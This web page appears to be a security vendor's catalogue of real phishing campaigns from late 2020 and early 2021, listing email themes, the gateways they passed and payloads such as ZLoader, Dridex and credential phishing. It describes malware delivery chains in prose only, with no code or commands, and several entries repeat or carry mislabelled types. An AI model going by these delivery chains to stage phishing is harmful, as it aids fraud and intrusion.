Filter by SEG

SEG

Tactic

Theme

A phishing attack is when a fraudster sends an email to trick the recipient. The idea is to persuade the target into giving up sensitive information, for instance, your corporate network credentials, or perhaps to authorize some type of financial transaction. The vast majority of data breaches against businesses today begin as phishing attacks.

Just a couple of famous phishing examples:

The infamous Target breach back in 2013 started with a phishing email that gave attackers a foothold in Target’s business systems for further attacks.
Phishing appeared prominently in the Mueller Report on the 2016 presidential election hacking.

Some quick phishing statistics:

Over 55% organizations experienced a successful phish last year.
$12 billion is the 5-year global cost of just one type of phishing attack, business email compromise (BEC).
The average phishing attack costs a mid-sized business $3.86 million.

Our database has thousands of phishing examples, but most fit into one of these 3 categories:

Phishing Emails with Malicious Links: Sometimes a phishing attack is simply an email with an embedded link. When you click, you either unknowingly activate malware or are directed to a webpage that looks perfectly legitimate but is designed to harvest your information.

Phishing Attacks with Malicious Attachments: Phishing attackers often send emails with attachments containing malware. When you click, look out. Many times phishing attackers use popular document types such as Microsoft Word or Excel or even Adobe PDFs. They take advantage of the trust people place in popular business tools.

Business Email Compromise (BEC): BEC emails, also known as CEO Fraud, typically don’t use malware but simply try to manipulate the target into sending money. Traditionally, BEC phishing attacks try to get employees in the finance department to authorize wire transfers, for instance, to a “vendor” or “partner.” This kind of attack often uses ‘CEO fraud phishing’ where attackers pretend to be the CEO or CFO to spur quick action.

Real Phishing Example: Finance-themed emails found in environments protected by Microsoft ATP, Cisco Ironport, Proofpoint, and Symantec MessageLabs deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Symantec

TYPE: ZLoader

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: fInance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Microsoft ATP, Cisco Ironport, Proofpoint, and Symantec MessageLabs deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver a JavaScript file via an embedded URL. The JavaScript file unpacks and runs STRRAT.

ENVIRONMENTS: Proofpoint

TYPE: STRRAT

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver a JavaScript file via an embedded URL. The JavaScript file unpacks and runs STRRAT.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver JNLP shortcut files via XXE archives. The JNLP files download and run a JAR Downloader which in turn downloads Smoke Loader.

ENVIRONMENTS: Proofpoint

TYPE: Smoke Loader

POSTED ON: 03/02/2021

TACTIC: downloader attachment

THEME: FInance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver JNLP shortcut files via XXE archives. The JNLP files download and run a JAR Downloader which in turn downloads Smoke Loader.

Real Phishing Example: Microsoft-spoofing emails found in environments protected by Microsoft ATP deliver Credential Phishing via an embedded link.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Microsoft-spoofing emails found in environments protected by Microsoft ATP deliver Credential Phishing via an embedded link.

Real Phishing Example: Xerox-spoofing emails found in environments protected by Microsoft ATP deliver Credential Phishing via an embedded link.

ENVIRONMENTS: microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Xerox-spoofing emails found in environments protected by Microsoft ATP deliver Credential Phishing via an embedded link.

Real Phishing Example: Finance-themed emails found in environments protected by Microsoft ATP, Cisco Ironport, Proofpoint, and Symantec MessageLabs deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Microsoft Defender for O365, Cisco Ironport, Proofpoint, and Symantec MessageLabs

TYPE: ZLoader

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Microsoft ATP, Cisco Ironport, Proofpoint, and Symantec MessageLabs deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

Real Phishing Example: Finance-themed emails found in environments protected by Microsoft ATP, Cisco Ironport, Proofpoint, and Symantec MessageLabs deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Zloader

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: fInance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Microsoft ATP, Cisco Ironport, Proofpoint, and Symantec MessageLabs deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

Real Phishing Example: Finance-themed emails found in environments protected by Microsoft ATP, Cisco Ironport, Proofpoint, and Symantec MessageLabs deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Cisco Ironport

TYPE: ZLoader

POSTED ON: 03/02/2021

TACTIC: embedded URLs

THEME: fInance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Microsoft ATP, Cisco Ironport, Proofpoint, and Symantec MessageLabs deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver JNLP shortcut files via XXE archives. The JNLP files download and run a JAR Downloader which in turn downloads Smoke Loader.

ENVIRONMENTS: Proofpoint

TYPE: Smoke Loader

POSTED ON: 03/01/2021

TACTIC: downloader attachment

THEME: FInance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver JNLP shortcut files via XXE archives. The JNLP files download and run a JAR Downloader which in turn downloads Smoke Loader.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Microsoft Defender for O365, and Mimecast deliver password protected Office macro laden spreadsheets via embedded links. The spreadsheets download Dridex.

ENVIRONMENTS: Proofpoint

TYPE: Dridex

POSTED ON: 02/24/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Microsoft Defender for O365, and Mimecast deliver password protected Office macro laden spreadsheets via embedded links. The spreadsheets download Dridex.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Microsoft Defender for O365, and Mimecast deliver password protected Office macro laden spreadsheets via embedded links. The spreadsheets download Dridex.

ENVIRONMENTS: Cisco Ironport

TYPE: Dridex

POSTED ON: 02/24/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Microsoft Defender for O365, and Mimecast deliver password protected Office macro laden spreadsheets via embedded links. The spreadsheets download Dridex.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Microsoft Defender for O365, and Mimecast deliver password protected Office macro laden spreadsheets via embedded links. The spreadsheets download Dridex.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Dridex

POSTED ON: 02/24/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Microsoft Defender for O365, and Mimecast deliver password protected Office macro laden spreadsheets via embedded links. The spreadsheets download Dridex.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Microsoft Defender for O365, and Mimecast deliver password protected Office macro laden spreadsheets via embedded links. The spreadsheets download Dridex.

ENVIRONMENTS: Mimecast

TYPE: Dridex

POSTED ON: 02/24/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint, Cisco IronPort, Microsoft Defender for O365, and Mimecast deliver password protected Office macro laden spreadsheets via embedded links. The spreadsheets download Dridex.

Real Phishing Example: Fax-themed emails found in environments protected by Proofpoint deliver Agent Tesla Keylogger via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Agent Tesla Keylogger

POSTED ON: 02/23/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Fax-themed emails found in environments protected by Proofpoint deliver Agent Tesla Keylogger via an embedded URL.

Real Phishing Example: Notification-themed emails found in environments protected by Microsoft Defender for O365 deliver credential phishing via an embedded link.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phishing

POSTED ON: 02/23/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Microsoft Defender for O365 deliver credential phishing via an embedded link.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and Microsoft Defender for O365 deliver an attached malware downloader that downloads Amadey. Amadey downloads and runs Remcos RAT.

ENVIRONMENTS: Proofpoint

TYPE: Remcos RAT

POSTED ON: 02/22/2021

TACTIC: RAR Attachment

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint and Microsoft Defender for O365 deliver an attached malware downloader that downloads Amadey. Amadey downloads and runs Remcos RAT.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and Microsoft Defender for O365 deliver an attached malware downloader that downloads Amadey. Amadey downloads and runs Remcos RAT.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Remcos RAT

POSTED ON: 02/22/2021

TACTIC: RAR Attachment

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint and Microsoft Defender for O365 deliver an attached malware downloader that downloads Amadey. Amadey downloads and runs Remcos RAT.

Real Phishing Example: Finance-themed emails found in environments protected by Microsoft Defender for O365 deliver Credential Phishing via an embedded link

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phishing

POSTED ON: 02/19/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Microsoft Defender for O365 deliver Credential Phishing via an embedded link

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Ironport, Mimecast, and Microsoft Defender for O365 deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Zloader

POSTED ON: 02/18/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint, Ironport, Mimecast, and Microsoft Defender for O365 deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Ironport, Mimecast, and Microsoft Defender for O365 deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Mimecast

TYPE: Zloader

POSTED ON: 02/18/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint, Ironport, Mimecast, and Microsoft Defender for O365 deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Ironport, Mimecast, and Microsoft Defender for O365 deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Ironport

TYPE: Zloader

POSTED ON: 02/18/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint, Ironport, Mimecast, and Microsoft Defender for O365 deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Ironport, Mimecast, and Microsoft Defender for O365 deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Zloader

POSTED ON: 02/18/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint, Ironport, Mimecast, and Microsoft Defender for O365 deliver ZLoader via Office macro laden spreadsheets. The spreadsheets are downloaded from embedded URLs.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and O365-ATP deliver an attached malware downloader that downloads Amadey. Amadey downloads and runs Remcos RAT.

ENVIRONMENTS: Proofpoint

TYPE: Remcos RAT

POSTED ON: 02/09/2021

TACTIC: RAR Attachment

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint and O365-ATP deliver an attached malware downloader that downloads Amadey. Amadey downloads and runs Remcos RAT.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint and O365-ATP deliver an attached malware downloader that downloads Amadey. Amadey downloads and runs Remcos RAT.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Remcos RAT

POSTED ON: 02/09/2021

TACTIC: RAR Attachment

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint and O365-ATP deliver an attached malware downloader that downloads Amadey. Amadey downloads and runs Remcos RAT.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver NanoCore RAT via embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 02/01/2021

TACTIC: URL link embedded

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver NanoCore RAT via embedded URLs.

Real Phishing Example: Notification-themed emails found in environments protected by Microsoft ATP deliver credential phishing via a MailChimp Click Tracking URL.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 02/01/2021

TACTIC: URL link embedded

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Microsoft ATP deliver credential phishing via a MailChimp Click Tracking URL.

Real Phishing Example: DHL-spoofing emails found in environments protected by Proofpoint and Microsoft ATP deliver Agent Tesla keylogger via embedded links. The embedded links download a 7Z archive that contains an Agent Tesla executable.

ENVIRONMENTS: Proofpoint

TYPE: Keylogger

POSTED ON: 02/01/2021

TACTIC: URL link embedded

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: DHL-spoofing emails found in environments protected by Proofpoint and Microsoft ATP deliver Agent Tesla keylogger via embedded links. The embedded links download a 7Z archive that contains an Agent Tesla executable.

Real Phishing Example: Document-themed emails found in environments protected by Microsoft ATP deliver Credential Phishing via an embedded URL.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 01/28/2021

TACTIC: URL link embedded

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Document-themed emails found in environments protected by Microsoft ATP deliver Credential Phishing via an embedded URL.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver Quasar RAT via Office Macros downloaded from embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 01/28/2021

TACTIC: URL link embedded

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver Quasar RAT via Office Macros downloaded from embedded URLs.

Real Phishing Example: LAN Associates-spoofing emails found in environments protected by O365-ATP deliver credential phishing via an embedded URL.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 01/22/2021

TACTIC: URL link embedded

THEME: Consumer Goods

PHISHING EXAMPLE DESCRIPTION: LAN Associates-spoofing emails found in environments protected by O365-ATP deliver credential phishing via an embedded URL.

Real Phishing Example: Finance-themed emails found in environments protected by Microsoft ATP to deliver credential phishing via an embedded URL.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 01/22/2021

TACTIC: URL link embedded

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Microsoft ATP to deliver credential phishing via an embedded URL.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver ZLoader via malicious Office macros.

ENVIRONMENTS: Proofpoint

TYPE: ZLoader

POSTED ON: 01/22/2021

TACTIC: DCOM Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver ZLoader via malicious Office macros.

Real Phishing Example: Notification-themed emails found in environments protected by Microsoft ATP deliver Credential Phishing via an embedded URL.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 01/22/2021

TACTIC: URL Link embedded

THEME: Healthcare

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Microsoft ATP deliver Credential Phishing via an embedded URL.

Real Phishing Example: IRS-spoofed emails found in environments protected by Proofpoint and Microsoft ATP to deliver credential phishing via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 01/22/2021

TACTIC: URL link embedded

THEME: Real Estate

PHISHING EXAMPLE DESCRIPTION: IRS-spoofed emails found in environments protected by Proofpoint and Microsoft ATP to deliver credential phishing via an embedded URL.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 01/22/2021

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links.

Real Phishing Example: Order-themed emails found in environments protected by Proofpoint and O365-ATP deliver TrickBot via Office macro laden spreadsheets downloaded from embedded URLs.

ENVIRONMENTS: Proofpoint

TYPE: Keylogger

POSTED ON: 01/21/2021

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Order-themed emails found in environments protected by Proofpoint and O365-ATP deliver TrickBot via Office macro laden spreadsheets downloaded from embedded URLs.

Real Phishing Example: Impots-spoofing emails found in environments protected by Proofpoint deliver Client Maximus banking trojan via an Advanced INF Installer which is downloaded from an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 01/20/2021

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Impots-spoofing emails found in environments protected by Proofpoint deliver Client Maximus banking trojan via an Advanced INF Installer which is downloaded from an embedded URL.

Real Phishing Example: Finance-themed emails found in environments protected by Symantec deliver Agent Tesla keylogger via an embedded URL.

ENVIRONMENTS: Symantec

TYPE: Keylogger

POSTED ON: 01/15/2021

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Symantec deliver Agent Tesla keylogger via an embedded URL.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via an embedded URL. Note: This was in Spanish.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 01/15/2021

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via an embedded URL. Note: This was in Spanish.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via an embedded URL

ENVIRONMENTS: Proofpoint

TYPE: credential phish

POSTED ON: 01/15/2021

TACTIC: URL link

THEME: Manufacturing

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via an embedded URL

Real Phishing Example: Support-themed emails found in environments protected by Symantec deliver NetWire RAT hosted on Microsoft OneDrive. The hosted file is a RAR archive containing NetWire.

ENVIRONMENTS: Symantec

TYPE: NetWire

POSTED ON: 01/08/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Support-themed emails found in environments protected by Symantec deliver NetWire RAT hosted on Microsoft OneDrive. The hosted file is a RAR archive containing NetWire.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Mimecast, and Symantec deliver Dridex via Office Macros downloaded from Embedded URLs. The Office Macros download and run Dridex.

ENVIRONMENTS: Symantec

TYPE: Dridex

POSTED ON: 01/04/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint, Mimecast, and Symantec deliver Dridex via Office Macros downloaded from Embedded URLs. The Office Macros download and run Dridex.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver Ave_Maria stealer via embedded links. The embedded links download an Office Macro that downloads an Ave_Maria executable.

ENVIRONMENTS: Proofpoint

TYPE: Ava_Maria_Stealer

POSTED ON: 01/04/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver Ave_Maria stealer via embedded links. The embedded links download an Office Macro that downloads an Ave_Maria executable.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 01/04/2021

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint deliver credential phishing via embedded links.

Real Phishing Example: Invoice-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver BazarBackdoor via PDF attachments. The attached PDF redirects to a site that collects invoice order numbers, once the order number is entered it redirects to a payload URL that downloads an OfficeMacro. The OfficeMacro downloads and runs BazarBackdoor.

ENVIRONMENTS: Proofpoint

TYPE: BazarBackdoor

POSTED ON: 01/04/2021

TACTIC: PDF Attachment

PHISHING EXAMPLE DESCRIPTION: Invoice-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver BazarBackdoor via PDF attachments. The attached PDF redirects to a site that collects invoice order numbers, once the order number is entered it redirects to a payload URL that downloads an OfficeMacro. The OfficeMacro downloads and runs BazarBackdoor.

Real Phishing Example: Invoice-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver BazarBackdoor via PDF attachments. The attached PDF redirects to a site that collects invoice order numbers, once the order number is entered it redirects to a payload URL that downloads an OfficeMacro. The OfficeMacro downloads and runs BazarBackdoor.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: BazarBackdoor

POSTED ON: 01/04/2021

TACTIC: PDF Attachment

PHISHING EXAMPLE DESCRIPTION: Invoice-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver BazarBackdoor via PDF attachments. The attached PDF redirects to a site that collects invoice order numbers, once the order number is entered it redirects to a payload URL that downloads an OfficeMacro. The OfficeMacro downloads and runs BazarBackdoor.

Real Phishing Example: Invoice-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver BazarBackdoor via PDF attachments. The attached PDF redirects to a site that collects invoice order numbers, once the order number is entered it redirects to a payload URL that downloads an OfficeMacro. The OfficeMacro downloads and runs BazarBackdoor.

ENVIRONMENTS: Symantec

TYPE: BazarBackdoor

POSTED ON: 01/04/2021

TACTIC: PDF Attachment

PHISHING EXAMPLE DESCRIPTION: Invoice-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver BazarBackdoor via PDF attachments. The attached PDF redirects to a site that collects invoice order numbers, once the order number is entered it redirects to a payload URL that downloads an OfficeMacro. The OfficeMacro downloads and runs BazarBackdoor.

Real Phishing Example: Finance-themed emails found in environments protected by Symantec deliverdeliver attached XLS files. These files download and run Buer Loader.

ENVIRONMENTS: Symantec

TYPE: Buer Loader

POSTED ON: 01/04/2021

TACTIC: XLS Attachment

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Symantec deliverdeliver attached XLS files. These files download and run Buer Loader.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Mimecast, and Symantec deliver Dridex via Office Macros downloaded from Embedded URLs. The Office Macros download and run Dridex.

ENVIRONMENTS: Proofpoint

TYPE: Dridex

POSTED ON: 01/04/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint, Mimecast, and Symantec deliver Dridex via Office Macros downloaded from Embedded URLs. The Office Macros download and run Dridex.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint, Mimecast, and Symantec deliver Dridex via Office Macros downloaded from Embedded URLs. The Office Macros download and run Dridex.

ENVIRONMENTS: Mimecast

TYPE: Dridex

POSTED ON: 01/04/2021

TACTIC: Link

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint, Mimecast, and Symantec deliver Dridex via Office Macros downloaded from Embedded URLs. The Office Macros download and run Dridex.

Real Phishing Example: Finance or response-themed emails found in environments protected by Proofpoint deliver Office macro laden documents directly attached or via attached password protected archives. The documents download Emotet.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 12/29/2020

TACTIC: Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance or response-themed emails found in environments protected by Proofpoint deliver Office macro laden documents directly attached or via attached password protected archives. The documents download Emotet.

Real Phishing Example: Information on staffing updates-themed emails found in environments protected by Proofpoint deliver TrickBot via attached Office macro laden spreadsheets.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 12/28/2020

TACTIC: Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Information on staffing updates-themed emails found in environments protected by Proofpoint deliver TrickBot via attached Office macro laden spreadsheets.

Real Phishing Example: Finance-themed campaign found in environments protected by O365-ATP delivers PDF files hosted on Google Drive. The PDF files provide links which download archives containing scripts. The scripts act as a Reconnaissance Tool, initiating an ongoing connection to a C2 to exfiltrate information and download additional payloads.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Trojan

POSTED ON: 12/28/2020

TACTIC: Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed campaign found in environments protected by O365-ATP delivers PDF files hosted on Google Drive. The PDF files provide links which download archives containing scripts. The scripts act as a Reconnaissance Tool, initiating an ongoing connection to a C2 to exfiltrate information and download additional payloads.

Real Phishing Example: Finance-themed emails found in environments protected by Mimecast deliver Dridex via Office macro laden documents downloaded from embedded URLs.

ENVIRONMENTS: Mimecast

TYPE: Trojan

POSTED ON: 12/28/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Mimecast deliver Dridex via Office macro laden documents downloaded from embedded URLs.

Real Phishing Example: Notification-themed emails found in environments protected by Microsoft ATP deliver credential phishing via an attached HTM file.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 12/18/2020

TACTIC: Attachment

THEME: Fiannce

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Microsoft ATP deliver credential phishing via an attached HTM file.

Real Phishing Example: Copyright Violation-themed emails found in environments protected by Proofpoint and Microsoft ATP deliver Makop ransomware via an ALZ attachment.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Ransomware

POSTED ON: 12/18/2020

TACTIC: Attachment

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Copyright Violation-themed emails found in environments protected by Proofpoint and Microsoft ATP deliver Makop ransomware via an ALZ attachment.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver credential phishing via an embedded link.

ENVIRONMENTS: Proofpoint

TYPE: Credential Phish

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver credential phishing via an embedded link.

Real Phishing Example: Finance-themed emails found in environments protected by Proofpoint deliver LuminosityLink RAT via an embedded URL.

ENVIRONMENTS: Proofpoint

TYPE: Trojan

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Finance-themed emails found in environments protected by Proofpoint deliver LuminosityLink RAT via an embedded URL.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver credential phishing via an embedded link.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Credential Phish

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver credential phishing via an embedded link.

Real Phishing Example: Notification-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver credential phishing via an embedded link.

ENVIRONMENTS: Symantec

TYPE: Credential Phish

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Notification-themed emails found in environments protected by Proofpoint, Microsoft ATP, and Symantec deliver credential phishing via an embedded link.

Real Phishing Example: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

ENVIRONMENTS: Cisco Ironport

TYPE: Keylogger

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

Real Phishing Example: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

ENVIRONMENTS: Microsoft Defender for O365

TYPE: Keylogger

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

Real Phishing Example: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

ENVIRONMENTS: Mimecast

TYPE: Keylogger

POSTED ON: 12/18/2020

TACTIC: URL Link

THEME: Finance

PHISHING EXAMPLE DESCRIPTION: Hubbell-spoofing emails found in environments protected by O365-ATP, Ironport, Mimecast, and Symantec deliver Office macro laden spreadsheets via embedded links. The spreadsheets drop and run the Get2 downloader.

